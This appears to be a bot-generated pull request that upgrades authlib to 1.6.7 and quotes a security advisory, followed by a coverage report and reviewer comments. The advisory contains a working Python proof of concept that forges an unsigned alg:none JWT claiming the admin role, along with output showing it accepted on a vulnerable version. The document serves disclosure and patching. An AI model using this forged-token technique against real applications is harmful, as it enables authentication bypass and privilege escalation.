chore(deps): update dependency authlib to v1.6.7 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
authlib	1.6.6 → 1.6.7

---

Warning

Some dependencies could not be looked up. Check the warning logs for more information.

GitHub Vulnerability Alerts

CVE-2026-28802

Summary

After upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.

Details

It was likely introduced in this commit:
authlib/authlib@a61c2ac

PoC

from authlib.jose import jwt, JsonWebKey
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
import json
import base64

def create_jwks():
    private_key = rsa.generate_private_key(
        public_exponent=65537, key_size=2048, backend=default_backend()
    )
    public_pem = private_key.public_key().public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    jwk = JsonWebKey.import_key(public_pem).as_dict()
    jwk["kid"] = "test-key-001"
    jwk["use"] = "sig"
    jwk["alg"] = "RS256"
    jwks = {"keys": [jwk]}
    return jwks

def create_forged_token_with_alg_none():
    forged_header = {"alg": "none"}
    forged_payload = {
        "sub": "user123",
        "role": "admin",
        "iat": 1735603200,
    }

    header_b64 = base64.urlsafe_b64encode(
        json.dumps(forged_header).encode("utf-8")
    ).rstrip(b"=")

    payload_b64 = base64.urlsafe_b64encode(
        json.dumps(forged_payload).encode("utf-8")
    ).rstrip(b"=")

    forged_token = header_b64 + b"." + payload_b64 + b"."
    return forged_token

jwks = create_jwks()
forged_token = create_forged_token_with_alg_none()
try:
    claims = jwt.decode(forged_token, jwks)
    print(f"VULNERABLE: Forged token (alg:none) accepted: role={claims['role']}")
except Exception as e:
    print(f"SECURE: Token rejected - {type(e).__name__}")

Output:

pip install -q authlib==1.5.2
python3 authlib_alg_none_vulnerability.py 
SECURE: Token rejected - BadSignatureError
pip install -q authlib==1.6.5
python3 authlib_alg_none_vulnerability.py 
VULNERABLE: Forged token (alg:none) accepted: role=admin

Impact

Users of the library are likely not aware that they now need to check the provided headers and disallow alg: none usage, it is not obvious from the release notes that any action needs to be taken. As a best-practice, the library should adopt a 'secure by default' stance and default to rejecting it and allow the application to provide an algorithm whitelist.

Applications using this library for authentication or authorization may accept malicious, forged JWTs, leading to:

• Authentication bypass
• Privilege escalation
• Unauthorized access
• Modification of application data

---

Release Notes

authlib/authlib (authlib)

v1.6.7

Compare Source

Full Changelog: authlib/authlib@v1.6.6...v1.6.7

Set supported algorithms for the default jwt instance.

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 73.97%. Comparing base (5f7e59e) to head (53956ea).
⚠️ Report is 1 commits behind head on main.

Additional details and impacted files

@@           Coverage Diff           @@
##             main     #954   +/-   ##
=======================================
  Coverage   73.97%   73.97%           
=======================================
  Files         108      108           
  Lines       10341    10341           
  Branches      887      887           
=======================================
  Hits         7650     7650           
  Misses       2503     2503           
  Partials      188      188           

Flag	Coverage Δ		*Carryforward flag
agent	74.64% <ø> (ø)		Carriedforward from 5f7e59e
cli	89.56% <ø> (ø)		Carriedforward from 5f7e59e
device	60.13% <ø> (ø)		Carriedforward from 5f7e59e
server	87.88% <ø> (ø)

*This pull request uses carry forward flags. Click here to find out more.

Components	Coverage Δ
Agent	74.64% <ø> (ø)
CLI	89.56% <ø> (ø)
Common	∅ <ø> (∅)
Device Connectors	60.13% <ø> (ø)
Server	87.88% <ø> (ø)

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[bladernr]

Couldn't resist clicking the dependabot button to see what it does to resolve this.

[ajzobro]

LGTM!

I was concerned at first read that it might try to suggest working values for an algorithm and, e.g. security salt value -- I would think we don't want any WORKING code with respect to auth keys because there ought to be a non-zero amount of effort to bring that online.

Seems like I was wrong :-)